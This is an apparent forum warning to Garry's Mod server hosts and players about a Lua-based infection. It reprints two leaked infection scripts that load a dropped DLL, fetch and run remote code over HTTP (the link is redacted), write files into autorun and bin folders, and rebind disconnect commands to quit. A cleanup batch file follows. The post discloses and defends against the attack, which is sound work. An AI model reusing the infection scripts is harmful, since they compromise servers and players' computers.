This is a alert towards both server hosts and players.
Recently (2 days ago, shut up if I'm late), a LUA infection was going, towards both clients and servers/server hosts.
Some of our clients, and our server, recently got messed with by Chrisaster, or one of his buddies that go under the same name, or VIN, these include the files client_infect.lua, and server_infect.lua.
Seems they do this through client uploads.
Not 100% sure, but it seems they Hack into RCON (They can get your RCON password through clientside lua, even with client uploads disabled), put some files on there, then they use some other fancy doodads to infect the server and clients more.
Some of their code leaked into our console, so here's what I found, make what you want of it, and keep in mind that these scripts were very recently made, this is a new thing:
Here's the server_infect.lua
-- Loaded over HTTP by Lua through CompileString(...)() via rcon request
if not system.IsWindows() then
return
end
if file.Exists("lua/autorun/server/default.lua", "MOD") then
return -- Already infected
end
timer.Create("infchk", 2, 0, function()
if file.Exists("download/engine_win32.dll", "MOD") then
timer.Remove("infchk")
require("/../../../download/engine")
http.Fetch("*ACTUAL LINK TO VIRUS CODE HERE", function(content)
CreateFile("garrysmod/lua/autorun/server/default.lua", content)
include("autorun/server/default.lua")
end, function() end)
end
end)
Here's the client_infect.lua
-- Loaded over HTTP by Lua through client:SendLua(..)
if not system.IsWindows() then
return
end
if file.Exists("bin/game_shader_generic_engine.dll", "MOD") then
return -- Already infected
end
timer.Create("infchk", 2, 0, function()
if file.Exists("download/engine_win32.dll", "MOD") then
timer.Remove("infchk")
require("/../../../download/engine")
http.Fetch("SAME HERE", function(content)
CreateFile("garrysmod/bin/game_shader_generic_engine.dll", GetShaderBinary())
CreateFile("garrysmod/materials/cooltexture.vtf", content)
local ret = CompileString( content, "l", false )
pcall(ret)
timer.Simple(4, function()
ConCommand("alias disconnect quit\n")
ConCommand("alias gamemenucommand quit\n")
ConCommand("alias retry quit\n")
ConCommand("alias connect quit\n")
ConCommand("alias map quit\n")
end)
end)
end
end)
Hey Garry, or Valve, maybe you can find some ways to fix this a bit?
Thanks, and VINH'LL FIX IT@@.
It's been fixed (yes by Vinh), but just in case you have any suspicions about it, you should try this code in a batch file, in your garrysmod folder, client or server. And if you say "WHICH GARRY'S MOD FOLDER", the one I'm talking about has steam.inf (the file) in it.
@echo off
title Exploit file cleanup - MFSiNC
if exist "hl2.exe" (
cd "garrysmod"
)
if not exist steam.inf (
echo.
echo You're running this from the wrong place!
echo.
echo Put this file in your garrysmod folder, either server or client, and re-run it.
echo.
echo.
pause
exit
)
echo.
echo This will remove the files used in the exploit/virus.
echo.
echo To see exactly what will be removed, open this batch file with Notepad.
echo.
pause
echo Cleaning..
taskkill /F /IM hl2.exe > nul
taskkill /F /IM srcds.exe > nul
::Files, clientside
if exist "engine_win32.dll" (
attrib -h "engine_win32.dll"
del /F /Q "engine_win32.dll"
)
if exist "materials\cooltexture.vtf" (
del /F /Q "materials\cooltexture.vtf"
)
if exist "bin\game_shader_generic_engine.dll" (
attrib -h "bin\game_shader_generic_engine.dll"
del /F /Q "bin\game_shader_generic_engine.dll"
)
if exist "download\engine_win32.dll" (
attrib -h "download\engine_win32.dll"
del /F /Q "download\engine_win32.dll"
)
::Dir
if exist "download\cfg" (
RD /S /Q "download\cfg"
)
::Files, serverside
if exist "lua\autorun\server\default.lua" (
attrib -h "lua\autorun\server\default.lua"
del /F /Q "lua\autorun\server\default.lua"
)
echo.
echo Done.
echo.
pausePaste that into notepad, save it as a .bat file, and run it. You probably don't have it, but if things have been going weird lately or you're a worried server host, try it.
Also, here's a video...of it?
https://www.youtube.com/watch?v=1lQEeX19YhQI don't know.
Either way, here's the Facepunch topic.
http://facepunch.com/showthread.php?t=1386818QUICKEDIT: Oh, and after MORE research, this was not only spreading onto Garry's Mod, but other source games at well. Also, ANYONE who has the file, WILL be banned by a server with QAC. bad stuff.
